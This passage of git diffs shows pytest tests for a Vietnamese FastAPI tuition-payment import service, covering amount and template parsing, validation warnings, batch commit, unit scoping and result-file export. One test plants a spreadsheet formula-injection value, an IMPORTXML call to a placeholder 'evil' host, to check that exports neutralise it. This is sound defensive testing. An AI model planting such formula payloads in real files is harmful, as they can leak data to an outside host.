         assert res.rows[0].status == ERROR
-        assert "không có học phí" in res.rows[0].message
+        assert "chưa được thiết lập học phí HK2" in res.rows[0].message
 
     async def test_payment_date_far_from_year_warns(self, db, seeded_dependencies):
         # Fix #5: ngày thu lệch xa năm học → WARNED (surface ở preview), không chặn cứng

--- a/Backend_FastAPI/tests/services/test_payment_import_service.py
+++ b/Backend_FastAPI/tests/services/test_payment_import_service.py
@@ -25,13 +25,21 @@ from app import models
 from app.models.finance import (
     Fee,
     Invoice,
+    Payment,
     PaymentImportBatch,
     PaymentImportBatchStatusEnum,
     PaymentImportRow,
     PaymentImportRowStatusEnum,
+    PaymentMethod,
+    PaymentTransaction,
 )
 from app.services import payment_import_service as pis
-from app.utils.exceptions import BadRequest, ConflictError
+from app.utils.exceptions import (
+    BadRequest,
+    BusinessRuleViolation,
+    ConflictError,
+    ResourceNotFoundError,
+)
 
 MATCHED = PaymentImportRowStatusEnum.matched.value
 WARNED = PaymentImportRowStatusEnum.warned.value
@@ -126,13 +134,17 @@ async def _seed_tuition(
     db.add(profile)
     await db.flush()
 
+    # fee thực tế = tổng các đợt (invoice) — thu đủ → fee 'paid'.
+    fee_total = sum(
+        (Decimal(str(amt)) for (_no, amt, *_rest) in invoices), Decimal("0")
+    )
     fee = Fee(
         admission_profile_id=profile.id,
         fee_type="tuition",
         academic_year=year,
         semester_no=semester,
-        base_amount=Decimal("100000000"),
-        final_amount=Decimal("100000000"),
+        base_amount=fee_total,
+        final_amount=fee_total,
         status="invoiced",
     )
     db.add(fee)
@@ -187,6 +199,27 @@ class TestParseAmount:
     def test_rejects_garbage(self):
         with pytest.raises(ValueError):
             pis.parse_amount_vn("abc")
+
+    def test_us_locale_thousands_comma(self):
+        # Fix #7: chuỗi locale US (',' = nghìn) phải parse đúng, không reject hàng loạt
+        assert pis.parse_amount_vn("7,200,000") == Decimal("7200000")
+        assert pis.parse_amount_vn("7,200,000.00") == Decimal("7200000.00")
+        assert pis.parse_amount_vn("1,234,567.50") == Decimal("1234567.50")
+
+    def test_single_comma_still_vn_decimal(self):
+        # Không regress: 1 dấu ',' giữ nghĩa thập phân VN
+        assert pis.parse_amount_vn("7,50") == Decimal("7.50")
+
+    def test_malformed_groups_rejected(self):
+        # Fix #9: nhóm nghìn sai (nhóm giữa ≠3) KHÔNG được nối thầm thành số
+        for bad in ("1.23.456", "1,23,456", "12.34.567"):
+            with pytest.raises(ValueError):
+                pis.parse_amount_vn(bad)
+
+    def test_amount_over_column_max_rejected(self):
+        # Fix #2: số quá lớn tràn Numeric(15,2) → lỗi sạch, không 500 ở persist
+        with pytest.raises(ValueError):
+            pis.parse_amount_vn("99999999999999")  # 14 số 9 > 9.999.999.999.999,99
 
     def test_nbsp_whitespace_separator(self):
         # File ngân hàng/Excel: '7 200 000' với non-breaking space (NBSP   /
@@ -345,6 +378,75 @@ class TestParseTemplate:
         drafts = pis.parse_template(content, "f.csv")
         assert drafts[0].citizen_id == "001234567890"
         assert drafts[0].reference == "PT-1"
+
+    def test_header_with_trailing_space_accepted(self):
+        # Fix #10: tên cột thừa khoảng trắng vẫn nhận đúng (strip header)
+        header = [c + " " for c in pis.TEMPLATE_COLS]
+        content = _xlsx_bytes(
+            [
+                header,
+                ["001234567890", "An", "1.000.000", "05/09/2026", "TM", "", ""],
+            ]
+        )
+        drafts = pis.parse_template(content, "f.xlsx")
+        assert len(drafts) == 1
+        assert drafts[0].citizen_id == "001234567890"
+        assert drafts[0].parse_error is None
+
+    def test_data_on_second_sheet_found(self):
+        # Fix #8: data ở sheet 2 (sau sheet "Hướng dẫn") KHÔNG bị bỏ thầm
+        from openpyxl import Workbook
+
+        wb = Workbook()
+        ws0 = wb.active
+        ws0.title = "Huong dan"
+        ws0.append(["Hướng dẫn điền form"])
+        ws1 = wb.create_sheet("Du lieu")
+        ws1.append(pis.TEMPLATE_COLS)
+        ws1.append(["001234567890", "An", "1.000.000", "05/09/2026", "TM", "", ""])
+        buf = io.BytesIO()
+        wb.save(buf)
+        drafts = pis.parse_template(buf.getvalue(), "f.xlsx")
+        assert len(drafts) == 1
+        assert drafts[0].citizen_id == "001234567890"
+
+    def test_raw_not_csv_sanitized(self):
+        # Fix #3: reference '-...' KHÔNG bị chèn ' vào raw (sanitize=việc export)
+        content = _csv_bytes(
+            [
+                pis.TEMPLATE_COLS,
+                ["001234567890", "An", "1.000.000", "05/09/2026", "TM", "-PT123", ""],
+            ]
+        )
+        drafts = pis.parse_template(content, "f.csv")
+        assert drafts[0].raw[pis.COL_REF] == "-PT123"  # KHÔNG có dấu ' đầu
+        assert drafts[0].reference == "-PT123"
+
+    def test_reference_too_long_is_parse_error(self):
+        # Fix P2(ref-len): ref > 100 ký tự (cột String(100)) → lỗi dòng sạch, không 500
+        long_ref = "X" * 101
+        content = _csv_bytes(
+            [
+                pis.TEMPLATE_COLS,
+                ["001234567890", "An", "1.000.000", "05/09/2026", "TM", long_ref, ""],
+            ]
+        )
+        drafts = pis.parse_template(content, "f.csv")
+        assert drafts[0].parse_error is not None
+        assert "tham chiếu" in drafts[0].parse_error
+
+    def test_duplicate_columns_after_strip_rejected(self):
+        # Re-review fix: 'Số CCCD' + 'Số CCCD ' (thừa space) → sau strip TRÙNG tên →
+        # row.get trả Series → rác. Phải BadRequest rõ ràng, KHÔNG parse rác âm thầm.
+        header = list(pis.TEMPLATE_COLS) + ["Số CCCD "]
+        content = _csv_bytes(
+            [
+                header,
+                ["001234567890", "An", "1.000.000", "05/09/2026", "TM", "P", "", "X"],
+            ]
+        )
+        with pytest.raises(BadRequest):
+            pis.parse_template(content, "f.csv")
 
 
 # =============================================================================
@@ -619,6 +721,19 @@ class TestResolveValidate:
         assert res.rows[0].status == ERROR
         assert "không có học phí" in res.rows[0].message
 
+    async def test_payment_date_far_from_year_warns(self, db, seeded_dependencies):
+        # Fix #5: ngày thu lệch xa năm học → WARNED (surface ở preview), không chặn cứng
+        await _seed_tuition(
+            db,
+            seeded_dependencies,
+            citizen_id="001234567890",
+            invoices=[(1, "10000000", "issued", "0", "0")],
+        )
+        d = _draft("001234567890", "1000000", payment_date=date(2030, 9, 5))
+        res = await pis.resolve_and_validate(db, [d], 2026, 1, None)
+        assert res.rows[0].status == WARNED
+        assert "lệch xa năm học" in res.rows[0].message
+
 
 # =============================================================================
 # create_preview_batch / preview_import (DB persistence)
@@ -846,3 +961,509 @@ class TestPreviewBatch:
                 file_sha256_hex="c" * 64,
                 created_by_id=admin_user.id,
             )
+
+
+# =============================================================================
+# BV-3 — ghi tiền (get_system_user / auto_verify_payment / commit_batch)
+# =============================================================================
+async def _seed_system_user(db):
+    from app.security import get_password_hash
+
+    user = models.User(
+        username="system",
+        email="system@qlts.internal",
+        password_hash=get_password_hash("SystemX123!"),
+        full_name="System Policy",
+        role="user",
+        status="inactive",
+        unit_id=None,
+    )
+    db.add(user)
+    await db.flush()
+    return user
+
+
+async def _seed_cash_method(db):
+    m = PaymentMethod(code="cash", name="Tiền mặt", is_online=False, is_active=True)
+    db.add(m)
+    await db.flush()
+    return m
+
+
+async def _preview_batch(
+    db,
+    deps,
+    *,
+    importer_id,
+    citizen_id="001234567890",
+    name="Nguyễn Văn An",
+    amount="10.000.000",
+    invoices=((1, "10000000", "issued", "0", "0"),),
+    year=2026,
+    semester=1,
+):
+    """Seed chain + 1 dòng matched + preview_import → batch preview."""
+    await _seed_tuition(
+        db,
+        deps,
+        citizen_id=citizen_id,
+        lead_name=name,
+        invoices=list(invoices),
+        year=year,
+        semester=semester,
+    )
+    content = _csv_bytes(
+        [pis.TEMPLATE_COLS, [citizen_id, name, amount, "05/09/2026", "TM", "", ""]]
+    )
+    batch, _ = await pis.preview_import(
+        db,
+        content=content,
+        filename="thu.csv",
+        academic_year=year,
+        semester_no=semester,
+        created_by_id=importer_id,
+        unit_id=None,
+    )
+    return batch
+
+
+class TestGetSystemUser:
+    async def test_returns_seeded(self, db, seeded_dependencies):
+        await _seed_system_user(db)
+        u = await pis.get_system_user(db)
+        assert u.username == "system"
+
+    async def test_missing_raises(self, db, seeded_dependencies):
+        with pytest.raises(ConflictError):
+            await pis.get_system_user(db)
+
+    async def test_bad_fingerprint_raises(self, db, seeded_dependencies):
+        u = await _seed_system_user(db)
+        u.status = "active"  # sai fingerprint (phải inactive)
+        await db.flush()
+        with pytest.raises(ConflictError):
+            await pis.get_system_user(db)
+
+    async def test_fingerprint_rejects_non_bcrypt_hash(self, db, seeded_dependencies):
+        # Fix #14: fingerprint chặt hơn — password không phải bcrypt thật → từ chối
+        u = await _seed_system_user(db)
+        u.password_hash = "not-a-bcrypt-hash"
+        await db.flush()
+        with pytest.raises(ConflictError):
+            await pis.get_system_user(db)
+
+
+class TestCommitBatch:
+    async def test_commit_writes_payment(self, db, seeded_dependencies, admin_user):
+        sysu = await _seed_system_user(db)
+        await _seed_cash_method(db)
+        batch = await _preview_batch(db, seeded_dependencies, importer_id=admin_user.id)
+        batch_id = batch.id
+        sysu_id = sysu.id
+        await db.commit()
+
+        result, _cb = await pis.commit_batch(
+            db, batch_id=batch_id, importer_id=admin_user.id, unit_id=None
+        )
+        await db.commit()
+
+        assert result.committed_count == 1
+        assert result.payment_count == 1
+        assert result.total_amount == Decimal("10000000")
+
+        b = (
+            await db.execute(
+                select(PaymentImportBatch).where(PaymentImportBatch.id == batch_id)
+            )
+        ).scalar_one()
+        assert b.status == "committed" and b.committed_at is not None
+
+        pay = (await db.execute(select(Payment))).scalars().first()
+        assert pay.status == "verified"
+        assert pay.created_by_id == admin_user.id
+        assert pay.verified_by_id == sysu_id
+        assert pay.created_by_id != pay.verified_by_id  # maker-checker
+
+        inv = (await db.execute(select(Invoice))).scalars().first()
+        assert inv.paid_amount == Decimal("10000000")
+        assert inv.status == "paid"
+        fee = (
+            (await db.execute(select(Fee).where(Fee.fee_type == "tuition")))
+            .scalars()
+            .first()
+        )
+        assert fee.paid_amount == Decimal("10000000")
+        assert fee.status == "paid"
+
+        txn = (await db.execute(select(PaymentTransaction))).scalars().first()
+        assert txn.idempotency_key.startswith("bulkimport:")
+        assert txn.transaction_type == "payment"
+
+        row = (
+            await db.execute(
+                select(PaymentImportRow).where(PaymentImportRow.batch_id == batch_id)
+            )
+        ).scalar_one()
+        assert row.payment_ids == [pay.id]
+
+    async def test_recommit_rejected(self, db, seeded_dependencies, admin_user):
+        await _seed_system_user(db)
+        await _seed_cash_method(db)
+        batch = await _preview_batch(db, seeded_dependencies, importer_id=admin_user.id)
+        batch_id = batch.id
+        await db.commit()
+        await pis.commit_batch(
+            db, batch_id=batch_id, importer_id=admin_user.id, unit_id=None
+        )
+        await db.commit()
+        with pytest.raises(ConflictError):
+            await pis.commit_batch(
+                db, batch_id=batch_id, importer_id=admin_user.id, unit_id=None
+            )
+
+    async def test_importer_is_system_rejected(self, db, seeded_dependencies):
+        sysu = await _seed_system_user(db)
+        await _seed_cash_method(db)
+        batch = await _preview_batch(db, seeded_dependencies, importer_id=sysu.id)
+        batch_id = batch.id
+        sysu_id = sysu.id
+        await db.commit()
+        with pytest.raises(BusinessRuleViolation):
+            await pis.commit_batch(
+                db, batch_id=batch_id, importer_id=sysu_id, unit_id=None
+            )
+
+    async def test_toctou_fee_cancelled_skips(
+        self, db, seeded_dependencies, admin_user
+    ):
+        await _seed_system_user(db)
+        await _seed_cash_method(db)
+        batch = await _preview_batch(db, seeded_dependencies, importer_id=admin_user.id)
+        batch_id = batch.id
+        # hủy fee giữa preview→commit (TOCTOU)
+        fee = (
+            (await db.execute(select(Fee).where(Fee.fee_type == "tuition")))
+            .scalars()
+            .first()
+        )
+        fee.status = "cancelled"
+        await db.commit()
+
+        result, _ = await pis.commit_batch(
+            db, batch_id=batch_id, importer_id=admin_user.id, unit_id=None
+        )
+        await db.commit()
+
+        assert result.committed_count == 0
+        assert result.failed_count == 1
+        assert result.payment_count == 0
+        assert (await db.execute(select(Payment))).scalars().all() == []
+        row = (
+            await db.execute(
+                select(PaymentImportRow).where(PaymentImportRow.batch_id == batch_id)
+            )
+        ).scalar_one()
+        assert row.status == "error"
+        assert "cancelled" in (row.message or "")
+
+    async def test_fifo_two_invoices(self, db, seeded_dependencies, admin_user):
+        await _seed_system_user(db)
+        await _seed_cash_method(db)
+        batch = await _preview_batch(
+            db,
+            seeded_dependencies,
+            importer_id=admin_user.id,
+            amount="7.000.000",
+            invoices=(
+                (1, "4000000", "issued", "0", "0"),
+                (2, "6000000", "issued", "0", "0"),
+            ),
+        )
+        batch_id = batch.id
+        await db.commit()
+        result, _ = await pis.commit_batch(
+            db, batch_id=batch_id, importer_id=admin_user.id, unit_id=None
+        )
+        await db.commit()
+        assert result.committed_count == 1
+        assert result.payment_count == 2  # 4tr (đợt 1) + 3tr (tràn đợt 2)
+        assert result.total_amount == Decimal("7000000")
+        row = (
+            await db.execute(
+                select(PaymentImportRow).where(PaymentImportRow.batch_id == batch_id)
+            )
+        ).scalar_one()
+        assert len(row.payment_ids) == 2
+
+    async def test_lead_sync_hk1_cleared(self, db, seeded_dependencies, admin_user):
+        from app.services.lead_admission_sync import TUITION_PAID_STATUS
+
+        db.add(
+            models.ConsultationStatus(
+                id=TUITION_PAID_STATUS,
+                name="Đã đóng học phí",
+                color_code="#00aa00",
+                stage_id="stg01",
+            )
+        )
+        await db.flush()
+        await _seed_system_user(db)
+        await _seed_cash_method(db)
+        batch = await _preview_batch(db, seeded_dependencies, importer_id=admin_user.id)
+        batch_id = batch.id
+        prof = (await db.execute(select(models.AdmissionProfile))).scalars().first()
+        lead_id = prof.lead_id
+        await db.commit()
+
+        await pis.commit_batch(
+            db, batch_id=batch_id, importer_id=admin_user.id, unit_id=None
+        )
+        await db.commit()
+
+        lead = (
+            await db.execute(select(models.Lead).where(models.Lead.id == lead_id))
+        ).scalar_one()
+        assert lead.consultation_status_id == TUITION_PAID_STATUS
+
+    async def test_partial_alloc_overpay_not_counted(
+        self, db, seeded_dependencies, admin_user
+    ):
+        # Bug 1: phân-bổ-một-phần-rồi-overpay → savepoint rollback; tổng KHÔNG phình.
+        await _seed_system_user(db)
+        await _seed_cash_method(db)
+        batch = await _preview_batch(
+            db,
+            seeded_dependencies,
+            importer_id=admin_user.id,
+            amount="7.000.000",
+            invoices=(
+                (1, "4000000", "issued", "0", "0"),
+                (2, "6000000", "issued", "0", "0"),
+            ),
+        )
+        batch_id = batch.id
+        # giữa preview→commit: đợt 2 đã thu đủ ngoài → chỉ còn đợt 1 (4tr) payable
+        inv2 = (
+            (await db.execute(select(Invoice).where(Invoice.installment_no == 2)))
+            .scalars()
+            .first()
+        )
+        inv2.paid_amount = Decimal("6000000")
+        inv2.status = "paid"
+        await db.commit()
+
+        result, _ = await pis.commit_batch(
+            db, batch_id=batch_id, importer_id=admin_user.id, unit_id=None
+        )
+        await db.commit()
+
+        # 7tr > 4tr còn lại → dòng error, KHÔNG ghi nửa vời + tổng KHÔNG phình
+        assert result.committed_count == 0
+        assert result.payment_count == 0
+        assert result.total_amount == Decimal("0")
+        assert (await db.execute(select(Payment))).scalars().all() == []
+
+    async def test_lead_sync_failure_keeps_money(
+        self, db, seeded_dependencies, admin_user, monkeypatch
+    ):
+        # Bug 2: lead-sync raise KHÔNG được hủy tiền đã ghi của cả lô.
+        async def _boom(**kwargs):
+            raise RuntimeError("lead sync boom")
+
+        monkeypatch.setattr(
+            "app.services.lead_admission_sync.sync_lead_tuition_paid", _boom
+        )
+        await _seed_system_user(db)
+        await _seed_cash_method(db)
+        batch = await _preview_batch(db, seeded_dependencies, importer_id=admin_user.id)
+        batch_id = batch.id
+        await db.commit()
+
+        result, _ = await pis.commit_batch(
+            db, batch_id=batch_id, importer_id=admin_user.id, unit_id=None
+        )
+        await db.commit()
+
+        # tiền vẫn ghi dù lead-sync nổ
+        assert result.payment_count == 1
+        pay = (await db.execute(select(Payment))).scalars().first()
+        assert pay is not None and pay.status == "verified"
+        b = (
+            await db.execute(
+                select(PaymentImportBatch).where(PaymentImportBatch.id == batch_id)
+            )
+        ).scalar_one()
+        assert b.status == "committed"
+
+    async def test_cross_unit_creator_rejected(
+        self, db, seeded_dependencies, second_unit, officer_user, admin_user
+    ):
+        # P1 #1: committer khác đơn vị người tạo lô → 404 (không poison lô đơn vị khác).
+        await _seed_system_user(db)
+        await _seed_cash_method(db)
+        batch = await _preview_batch(
+            db, seeded_dependencies, importer_id=officer_user.id
+        )  # officer_user unit 1001
+        batch_id = batch.id
+        await db.commit()
+        with pytest.raises(ResourceNotFoundError):
+            await pis.commit_batch(
+                db,
+                batch_id=batch_id,
+                importer_id=admin_user.id,
+                unit_id=second_unit.id,  # unit 2001 ≠ creator unit 1001
+            )
+        b = (
+            await db.execute(
+                select(PaymentImportBatch).where(PaymentImportBatch.id == batch_id)
+            )
+        ).scalar_one()
+        assert b.status == "preview"  # không bị poison
+
+    async def test_all_rows_fail_keeps_preview_and_counters(
+        self, db, seeded_dependencies, admin_user
+    ):
+        # Fix #4 + #1: lô commit fail-TOÀN-BỘ → GIỮ 'preview' (không khóa file) +
+        # counter/total recompute về số THỰC (0), không giữ overstate preview.
+        await _seed_system_user(db)
+        await _seed_cash_method(db)
+        batch = await _preview_batch(
+            db, seeded_dependencies, importer_id=admin_user.id
+        )
+        batch_id = batch.id
+        # hủy fee giữa preview→commit → dòng (matched ở preview) fail lúc commit
+        fee = (
+            (await db.execute(select(Fee).where(Fee.fee_type == "tuition")))
+            .scalars()
+            .first()
+        )
+        fee.status = "cancelled"
+        await db.commit()
+
+        result, _ = await pis.commit_batch(
+            db, batch_id=batch_id, importer_id=admin_user.id, unit_id=None
+        )
+        await db.commit()
+        assert result.committed_count == 0
+        b = (
+            await db.execute(
+                select(PaymentImportBatch).where(PaymentImportBatch.id == batch_id)
+            )
+        ).scalar_one()
+        assert b.status == "preview"  # KHÔNG khóa file (re-import được)
+        assert b.total_amount == Decimal("0")  # không giữ số preview overstate
+        assert b.matched_count == 0
+        assert b.failed_count == 1
+
+    async def test_committed_counters_reflect_actual_writes(
+        self, db, seeded_dependencies, admin_user
+    ):
+        # Fix #1: 2 đợt, commit thành công → total_amount/counter của batch = tiền THỰC
+        await _seed_system_user(db)
+        await _seed_cash_method(db)
+        batch = await _preview_batch(
+            db,
+            seeded_dependencies,
+            importer_id=admin_user.id,
+            amount="7.000.000",
+            invoices=(
+                (1, "4000000", "issued", "0", "0"),
+                (2, "6000000", "issued", "0", "0"),
+            ),
+        )
+        batch_id = batch.id
+        await db.commit()
+        await pis.commit_batch(
+            db, batch_id=batch_id, importer_id=admin_user.id, unit_id=None
+        )
+        await db.commit()
+        b = (
+            await db.execute(
+                select(PaymentImportBatch).where(PaymentImportBatch.id == batch_id)
+            )
+        ).scalar_one()
+        assert b.status == "committed"
+        assert b.total_amount == Decimal("7000000")  # tiền thực ghi
+        assert b.failed_count == 0
+
+    async def test_reference_dangerous_prefix_committed_clean(
+        self, db, seeded_dependencies, admin_user
+    ):
+        # Fix #3: mã tham chiếu bắt đầu '-' ghi vào Payment SẠCH (không có dấu ' đầu)
+        await _seed_system_user(db)
+        await _seed_cash_method(db)
+        await _seed_tuition(
+            db,
+            seeded_dependencies,
+            citizen_id="001234567890",
+            invoices=[(1, "10000000", "issued", "0", "0")],
+        )
+        content = _csv_bytes(
+            [
+                pis.TEMPLATE_COLS,
+                [
+                    "001234567890",
+                    "Nguyễn Văn An",
+                    "10.000.000",
+                    "05/09/2026",
+                    "TM",
+                    "-PT-2026-001",
+                    "",
+                ],
+            ]
+        )
+        batch, _ = await pis.preview_import(
+            db,
+            content=content,
+            filename="thu.csv",
+            academic_year=2026,
+            semester_no=1,
+            created_by_id=admin_user.id,
+            unit_id=None,
+        )
+        batch_id = batch.id
+        await db.commit()
+        await pis.commit_batch(
+            db, batch_id=batch_id, importer_id=admin_user.id, unit_id=None
+        )
+        await db.commit()
+        pay = (await db.execute(select(Payment))).scalars().first()
+        assert pay.reference_code == "-PT-2026-001"  # KHÔNG có dấu ' đầu
+
+
+class TestListBatches:
+    async def test_unit_scope(self, db, seeded_dependencies, second_unit, officer_user):
+        # P1 #2: list lô unit-scope theo đơn vị người tạo.
+        from app.security import get_password_hash
+
+        u2001 = models.User(
+            username="fin2001",
+            email="fin2001@test.com",
+            password_hash=get_password_hash("X123!"),
+            role="accountant",
+            status="active",
+            unit_id=second_unit.id,
+        )
+        db.add(u2001)
+        await db.flush()
+        for created_by in (officer_user.id, u2001.id):
+            db.add(
+                PaymentImportBatch(
+                    academic_year=2026,
+                    semester_no=1,
+                    file_name="f.csv",
+                    file_sha256=f"{created_by:064d}",
+                    status="preview",
+                    created_by_id=created_by,
+                )
+            )
+        await db.flush()
+
+        items_a, total_a = await pis.list_batches(
+            db, unit_id=seeded_dependencies["unit_id"]
+        )
+        assert total_a == 1
+        assert items_a[0].created_by_id == officer_user.id
+
+        items_all, total_all = await pis.list_batches(db, unit_id=None)
+        assert total_all == 2

--- a/Backend_FastAPI/tests/services/test_payment_import_service.py
+++ b/Backend_FastAPI/tests/services/test_payment_import_service.py
@@ -492,6 +492,12 @@ class TestBuildTemplate:
 
 
 class TestResolveValidate:
+    @pytest.fixture(autouse=True)
+    async def _methods(self, db):
+        # G2: resolve nay validate hình thức ACTIVE → seed cash (active) cho mọi test.
+        # KHÔNG seed bank_transfer → dùng để test method inactive/missing.
+        await _seed_cash_method(db)
+
     async def test_matched_single_invoice(self, db, seeded_dependencies):
         await _seed_tuition(
             db,
@@ -604,7 +610,8 @@ class TestResolveValidate:
             1,
             None,
         )
-        assert res.rows[0].status == MATCHED
+        assert res.rows[0].status == WARNED  # G1: trùng CCCD+cùng tiền → cảnh báo
+        assert "nghi copy" in res.rows[0].message
         assert res.rows[1].status == ERROR  # 6tr > 4tr còn lại
         assert "vượt tổng còn nợ" in res.rows[1].message
 
@@ -734,11 +741,92 @@ class TestResolveValidate:
         assert res.rows[0].status == WARNED
         assert "lệch xa năm học" in res.rows[0].message
 
+    async def test_g1_duplicate_cccd_same_amount_warns_copy(
+        self, db, seeded_dependencies
+    ):
+        # G1: 2 dòng cùng CCCD + CÙNG số tiền (nghi copy nhầm → thu khống) → cả 2 WARNED,
+        # message "nghi copy". Cả 2 vẫn lọt nợ (10tr) nên không bị chốt "vượt nợ" bắt.
+        await _seed_tuition(
+            db,
+            seeded_dependencies,
+            citizen_id="001234567890",
+            invoices=[(1, "10000000", "issued", "0", "0")],
+        )
+        res = await pis.resolve_and_validate(
+            db,
+            [
+                _draft("001234567890", "1000000", row_no=2),
+                _draft("001234567890", "1000000", row_no=3),
+            ],
+            2026,
+            1,
+            None,
+        )
+        assert res.rows[0].status == WARNED
+        assert res.rows[1].status == WARNED
+        assert "nghi copy" in res.rows[0].message
+        assert res.warned_count == 2 and res.matched_count == 0
+
+    async def test_g1_duplicate_cccd_diff_amount_warns_not_copy(
+        self, db, seeded_dependencies
+    ):
+        # G1: cùng CCCD KHÁC số tiền (tách đợt hợp lệ) → WARNED "kiểm tra trùng", KHÔNG "copy".
+        await _seed_tuition(
+            db,
+            seeded_dependencies,
+            citizen_id="001234567890",
+            invoices=[(1, "10000000", "issued", "0", "0")],
+        )
+        res = await pis.resolve_and_validate(
+            db,
+            [
+                _draft("001234567890", "1000000", row_no=2),
+                _draft("001234567890", "2000000", row_no=3),
+            ],
+            2026,
+            1,
+            None,
+        )
+        assert res.rows[0].status == WARNED
+        assert "kiểm tra trùng" in res.rows[0].message
+        assert "copy" not in res.rows[0].message
+
+    async def test_g2_method_inactive_is_error(self, db, seeded_dependencies):
+        # G2: hình thức map-OK theo text (bank_transfer) nhưng PaymentMethod INACTIVE trong
+        # DB → ERROR ngay ở preview (đối xứng commit:1017, hết "khớp giả"). Parser :346 đã
+        # chặn text lạ; đây test nhánh inactive/missing.
+        db.add(
+            PaymentMethod(
+                code="bank_transfer", name="CK", is_online=False, is_active=False
+            )
+        )
+        await db.flush()
+        await _seed_tuition(
+            db,
+            seeded_dependencies,
+            citizen_id="001234567890",
+            invoices=[(1, "10000000", "issued", "0", "0")],
+        )
+        res = await pis.resolve_and_validate(
+            db,
+            [_draft("001234567890", "1000000", method="bank_transfer")],
+            2026,
+            1,
+            None,
+        )
+        assert res.rows[0].status == ERROR
+        assert "kích hoạt" in res.rows[0].message
+
 
 # =============================================================================
 # create_preview_batch / preview_import (DB persistence)
 # =============================================================================
 class TestPreviewBatch:
+    @pytest.fixture(autouse=True)
+    async def _methods(self, db):
+        # G2: preview_import → resolve nay cần hình thức ACTIVE → seed cash.
+        await _seed_cash_method(db)
+
     async def test_preview_import_persists_batch_and_rows(
         self, db, seeded_dependencies, admin_user
     ):
@@ -1752,3 +1840,142 @@ class TestListBatches:
 
         items_all, total_all = await pis.list_batches(db, unit_id=None)
         assert total_all == 2
+
+
+# =============================================================================
+# BV-5 R2/R1 — build_result_file + get_batch_detail_scoped
+# =============================================================================
+_sha_seq = iter(range(10000, 99999))
+
+
+async def _mk_user(db, *, username, unit_id, role="accountant"):
+    from app.security import get_password_hash
+
+    u = models.User(
+        username=username,
+        email=f"{username}@t.local",
+        password_hash=get_password_hash("X123!abcd"),
+        full_name=username,
+        role=role,
+        status="active",
+        unit_id=unit_id,
+    )
+    db.add(u)
+    await db.flush()
+    return u
+
+
+async def _mk_batch_with_row(
+    db, *, creator_id, status, raw, row_status="matched", payment_ids=None, amount="1000000"
+):
+    batch = PaymentImportBatch(
+        academic_year=2026,
+        semester_no=1,
+        file_name="x.xlsx",
+        file_sha256=f"sha-{next(_sha_seq)}",
+        status=status,
+        row_count=1,
+        matched_count=1 if row_status != ERROR else 0,
+        warned_count=0,
+        failed_count=1 if row_status == ERROR else 0,
+        total_amount=Decimal(amount),
+        created_by_id=creator_id,
+    )
+    db.add(batch)
+    await db.flush()
+    row = PaymentImportRow(
+        batch_id=batch.id,
+        row_no=2,
+        citizen_id="001234567890",
+        raw=raw,
+        status=row_status,
+        amount=Decimal(amount),
+        message="",
+        payment_ids=payment_ids or [],
+    )
+    db.add(row)
+    await db.flush()
+    return batch
+
+
+class TestResultFileAndDetail:
+    async def test_build_result_file_sanitizes_formula_injection(
+        self, db, seeded_dependencies, admin_user
+    ):
+        # 🔴 P1: ô raw mở đầu '=' (=IMPORTXML) PHẢI ra TEXT ('=...) trong file kết quả,
+        # KHÔNG để openpyxl/Excel diễn giải thành công thức.
+        evil = '=IMPORTXML("http://evil/x","//a")'
+        batch = await _mk_batch_with_row(
+            db,
+            creator_id=admin_user.id,
+            status="committed",
+            raw={pis.COL_CCCD: "001234567890", pis.COL_NAME: evil},
+            payment_ids=[101],
+        )
+        content, media, fname = await pis.build_result_file(db, batch.id, "csv", None)
+        text = content.decode("utf-8")
+        # sanitize = prepend ' (CSV escape inner quotes "→"" nên chỉ check prefix).
+        assert "'=IMPORTXML" in text  # đã thành TEXT, không phải =IMPORTXML sống
+        assert ",=IMPORTXML" not in text  # KHÔNG có công thức sống ở đầu field
+        assert fname.endswith(".csv")
+        assert "Đã ghi" in text  # nhãn committed
+
+    async def test_build_result_file_xlsx_no_live_formula(
+        self, db, seeded_dependencies, admin_user
+    ):
+        from openpyxl import load_workbook
+
+        batch = await _mk_batch_with_row(
+            db,
+            creator_id=admin_user.id,
+            status="committed",
+            raw={pis.COL_CCCD: "001234567890", pis.COL_NAME: "=1+1"},
+            payment_ids=[101],
+        )
+        content, _, fname = await pis.build_result_file(db, batch.id, "xlsx", None)
+        assert fname.endswith(".xlsx")
+        wb = load_workbook(io.BytesIO(content))
+        ws = wb.active
+        # KHÔNG có ô nào là công thức sống (data_type 'f').
+        for row in ws.iter_rows():
+            for c in row:
+                assert c.data_type != "f", f"ô {c.coordinate} là formula sống!"
+
+    async def test_build_result_file_void_labels_da_dao_not_thanh_cong(
+        self, db, seeded_dependencies, admin_user
+    ):
+        # 🔴 P2: lô VOID → nhãn "Đã đảo" (tiền đã rút lại), KHÔNG "Thành công".
+        batch = await _mk_batch_with_row(
+            db,
+            creator_id=admin_user.id,
+            status="void",
+            raw={pis.COL_CCCD: "001234567890", pis.COL_NAME: "Nguyễn Văn A"},
+            payment_ids=[101],
+        )
+        content, _, _ = await pis.build_result_file(db, batch.id, "csv", None)
+        text = content.decode("utf-8")
+        assert "Đã đảo" in text
+        assert "Thành công" not in text
+
+    async def test_get_batch_detail_scoped_idor(self, db, seeded_dependencies):
+        # IDOR: lô do user unit 1001 tạo → manager unit 2002 KHÔNG xem được (404).
+        creator = await _mk_user(db, username="acc1001", unit_id=1001)
+        batch = await _mk_batch_with_row(
+            db,
+            creator_id=creator.id,
+            status="committed",
+            raw={pis.COL_CCCD: "001234567890"},
+        )
+        # khác đơn vị → ResourceNotFoundError
+        with pytest.raises(pis.ResourceNotFoundError):
+            await pis.get_batch_detail_scoped(db, batch.id, unit_id=2002)
+        # cùng đơn vị → OK
+        b, rows = await pis.get_batch_detail_scoped(db, batch.id, unit_id=1001)
+        assert b.id == batch.id and len(rows) == 1
+        # admin (None) → OK
+        b2, _ = await pis.get_batch_detail_scoped(db, batch.id, unit_id=None)
+        assert b2.id == batch.id
+
+    async def test_get_batch_detail_scoped_not_found(self, db, seeded_dependencies):
+        with pytest.raises(pis.ResourceNotFoundError):
+            await pis.get_batch_detail_scoped(db, 999999, unit_id=None)

--- a/Backend_FastAPI/tests/services/test_payment_import_service.py
+++ b/Backend_FastAPI/tests/services/test_payment_import_service.py
@@ -1979,3 +1979,39 @@ class TestResultFileAndDetail:
     async def test_get_batch_detail_scoped_not_found(self, db, seeded_dependencies):
         with pytest.raises(pis.ResourceNotFoundError):
             await pis.get_batch_detail_scoped(db, 999999, unit_id=None)
+
+    async def test_build_result_file_written_amount_no_trailing_cents(
+        self, db, seeded_dependencies, admin_user
+    ):
